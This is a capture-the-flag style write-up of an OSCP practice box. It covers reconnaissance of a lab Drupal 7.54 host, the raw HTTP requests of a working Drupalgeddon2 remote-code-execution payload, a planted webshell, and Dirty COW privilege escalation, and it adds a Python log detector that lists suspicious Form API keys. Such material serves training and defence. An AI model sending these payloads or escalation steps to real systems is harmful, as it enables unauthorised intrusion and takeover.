The second post in the OSCP practice-box series. If all you want is to get a shell, this box is fairly easy. To raise the difficulty I avoided Metasploit as much as possible (the exam only lets you use it once, after all) and wrote my own exploit.
Host discovery

```shell
nmap -sP 192.168.218.0/24
```

The target is found at 192.168.218.132.

```shell
nmap -sV -A -p- 192.168.218.132
```
```
Nmap scan report for 192.168.218.132
Host is up (0.00099s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?
| fingerprint-strings:
|   NULL:
|     (ASCII-art banner; its layout was lost in extraction)
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Lampi\xC3\xA3o
```
Port 80 serves nothing but a single picture.

On port 1898, CHANGELOG.txt gives the exact Drupal version: 7.54, 2017-02-01.

That looks directly exploitable with the Drupalgeddon2 RCE.

Metasploit indeed gets it in one go; I left a small webshell, s.php, with the password pass.

Looking for SUID privilege escalation

Upload linux-exploit-suggester.sh; Dirty COW can escalate privileges.

Interestingly, pocsuite3 did not detect Drupalgeddon2, yet Metasploit could exploit it. Let's analyze this properly.
```shell
tcpdump -w data.pcap -i eth0 -nn -s0 host 192.168.218.132
```
Capture the traffic of the Metasploit attack and filter for the HTTP protocol in Wireshark.

After reading the published analyses it becomes obvious: pocsuite3 only carries the Drupal 8 payload and does not cover Drupal 7.

Let's exploit it by hand.
```http
POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami HTTP/1.1
Host: 192.168.218.132:1898
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.218.132:1898
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.218.132:1898/?q=user/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: has_js=1
Connection: close

_triggering_element_name=name&form_id=user_pass
```

```http
POST /?q=file/ajax/name/%23default_value/form-3Q-zKa_nY1PvpbTGthaNXUxmyHAyUnpMmqp_jALevls HTTP/1.1
Host: 192.168.218.132:1898
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.218.132:1898
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.218.132:1898/?q=file/ajax/name/%23default_value/form-6JI87Jaq17bIYgG2BkOA_gVnNtWRyJTmwnw1VbqEMp4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: has_js=1; SESS07faf6555595fd9ed723577c1f01f9ec=rh2r55VofVS2NiqKCduex2bKVZVqXR5Q4ImL6p42ZxM
Connection: close

form_build_id=form-3Q-zKa_nY1PvpbTGthaNXUxmyHAyUnpMmqp_jALevls
```
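The two requests above leave a clear trace in the web server's access log: a `#` Form API key (URL-encoded as `%23`) inside user-supplied query parameters, or inside a `file/ajax/` path segment. The following detector is an added example written for this post, not code from the post or from pocsuite3; it scans Apache combined-format log lines for exactly those markers. The log lines are constructed to mirror the requests above, and the list of flagged keys is an assumption covering the keys used here plus other Form API callback keys.

```python
import re
from urllib.parse import unquote_plus

# Drupal Form API keys that Drupalgeddon2 smuggles into user input on Drupal 7.
# #post_render, #type and #markup are the ones used in the requests above; the
# other callback keys are added as an assumption (they are also render-array hooks).
SUSPICIOUS_KEYS = ("#post_render", "#pre_render", "#lazy_builder",
                   "#access_callback", "#markup", "#type")

# Apache combined log: host, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def inspect_request(target):
    """Return the indicators found in one request target. The target is decoded
    twice so that a double-encoded '#' (%2523) is caught as well."""
    decoded = unquote_plus(unquote_plus(target))
    found = [key for key in SUSPICIOUS_KEYS if key in decoded]
    # Drupal 7 file/ajax path with a '#' property injected as a path segment
    if "file/ajax/" in decoded and re.search(r'/#[a-z_]+', decoded):
        found.append("file/ajax-#property")
    return found

def scan_access_log(lines):
    """Return (ip, timestamp, target, indicators) for every suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        indicators = inspect_request(m.group("target"))
        if indicators:
            hits.append((m.group("ip"), m.group("ts"), m.group("target"), indicators))
    return hits

# Constructed sample log lines modelled on the requests in this post (not real logs).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2021:10:00:01 +0000] "GET /?q=node/1 HTTP/1.1" 200 5123
10.0.0.9 - - [01/Mar/2021:10:00:02 +0000] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami HTTP/1.1" 200 3321
10.0.0.9 - - [01/Mar/2021:10:00:03 +0000] "POST /?q=file/ajax/name/%23default_value/form-3Q-zKa_nY1PvpbTGthaNXUxmyHAyUnpMmqp_jALevls HTTP/1.1" 200 251
10.0.0.7 - - [01/Mar/2021:10:00:04 +0000] "GET /?q=user/password HTTP/1.1" 200 4110
"""

if __name__ == "__main__":
    for ip, ts, target, ind in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} {target[:60]} -> {', '.join(ind)}")
```

A legitimate password-reset request (the last sample line) produces no hit, while both exploit stages are flagged with the specific key that triggered them.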
After going through the Metasploit module and other public material, I wrote a pocsuite3 exploit of my own.

Project link

The webshell is written successfully; the variant that spawns a reverse shell directly did not connect back.

Spawning a reverse shell from the virtual terminal hits the same problem as before: ret=2 and no shell comes back, probably something in my environment. So I used Metasploit to get a bind shell instead.
```shell
./linux-exploit-suggester.sh
```
Skipping the entries that need conditions beyond the kernel version, the high-probability candidates are Dirty COW (40611) and Dirty COW 2 (40847).

I did not understand what this sequence of operations in the 40611 comment header is meant to do:
```
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
```
When I ran it, foo was owned by www-data, which is not what the comment shows, so I went with 40847 instead; its comment just gives the compile command and nothing else.
```shell
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow
```
The Metasploit traffic still leaves me with one question. In the TCP stream I see a PHP file being written first, and everything after that is no longer plaintext. The only HTTP requests are the ones in the screenshot: one checks the version, the other executes a single command. But that command is printf, so how does it write the file?